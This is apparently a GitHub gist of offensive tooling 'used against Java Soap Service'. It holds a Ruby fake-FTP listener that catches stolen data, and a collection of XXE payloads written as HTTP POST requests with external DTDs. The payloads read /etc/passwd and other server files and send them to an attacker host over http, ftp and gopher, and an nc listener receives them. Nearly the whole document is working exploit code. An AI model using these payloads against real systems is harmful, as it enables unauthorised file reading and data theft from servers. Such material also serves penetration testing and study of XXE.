Skip to content

Instantly share code, notes, and snippets.

@73696e65

73696e65/ftp.rb

Last active November 22, 2016 14:51
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save 73696e65/fa9f7852f6ac8673b92768b4172cbf67 to your computer and use it in GitHub Desktop.
Save 73696e65/fa9f7852f6ac8673b92768b4172cbf67 to your computer and use it in GitHub Desktop.
Download ZIP
Used against Java Soap Service
Raw
ftp.rb
#!/usr/bin/env ruby
require 'socket'
port = ARGV[0] || 31337
server = TCPServer.new port
puts "Listening on the port: #{port}"
loop do
Thread.start(server.accept) do |client|
puts "Client connected"
data = ""
client.puts("220 xxe-ftp-server")
loop do
req = client.gets()
puts "< " + req
if req.include? "USER"
client.puts("331 password please - version check")
else
client.puts("230 more data please!")
end
end
end
end
Raw
xxe-payloads.xml
--------------------------------------------------------------
XXE, where the text is reflected in the response
--------------------------------------------------------------
POST /service/ss HTTP/1.1
Content-Type: text/xml
Connection: close
<!DOCTYPE r [
<!ENTITY % start "<![CDATA[">
<!ENTITY % body SYSTEM "file:///etc/test.xml">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://x.x.x.x:y/a.dtd">
%dtd;
]>
...
<legitimate>&all;</legitimate>
--------------------------------------------------------------
a.dtd:
<!ENTITY all "%start;%body;%end;">
--------------------------------------------------------------
--------------------------------------------------------------
XXE Locator, making remote connection
--------------------------------------------------------------
POST /service/ss HTTP/1.1
Content-Type: text/xml
Connection: close
<!DOCTYPE r [
<!ENTITY connect SYSTEM "http://x.x.x.x:y/test">
]>
<r>&connect;</r>
--------------------------------------------------------------
--------------------------------------------------------------
XXE Blind Payload, without proper URL encoding
--------------------------------------------------------------
POST /service/ss HTTP/1.1
Content-Type: text/xml
Connection: close
<!DOCTYPE r [
<!ENTITY % connect SYSTEM "http://x.x.x.x:y/a.dtd">
%connect;
%param1;
]>
<r>&send;</r>
--------------------------------------------------------------
a.dtd:
<!ENTITY % data SYSTEM "file:///etc/system-release">
<!ENTITY % param1 "<!ENTITY send SYSTEM 'http://x.x.x.x:y/?%data;'>">
--------------------------------------------------------------
--------------------------------------------------------------
XXE Blind Payload, extraction with FTP
--------------------------------------------------------------
POST /service/ss HTTP/1.1
Content-Type: text/xml
Connection: close
<!DOCTYPE r [
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % connect SYSTEM "http://x.x.x.x:y/a.dtd">
%connect;
%param1;
%send;
]>
--------------------------------------------------------------
a.dtd:
<!ENTITY % param1 "<!ENTITY &#x25; send SYSTEM 'ftp://x.x.x.x:y/%data;'>">
--------------------------------------------------------------
--------------------------------------------------------------
XXE Blind Payload, extraction with gopher (using socket on port z)
--------------------------------------------------------------
POST /service/ss HTTP/1.1
Content-Type: text/xml
Connection: close
<!DOCTYPE r [
<!ENTITY % file SYSTEM "file:///proc/self/cwd">
<!ENTITY % dtd SYSTEM "http://x.x.x.x:y/a.dtd">
%dtd;]>
<r>&send;</r>
--------------------------------------------------------------
a.dtd:
<!ENTITY % yy "<!ENTITY send SYSTEM 'gopher://x.x.x.x:z/?%file;'>">
%yy;
--------------------------------------------------------------
$ nc -lvnp z
--------------------------------------------------------------
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment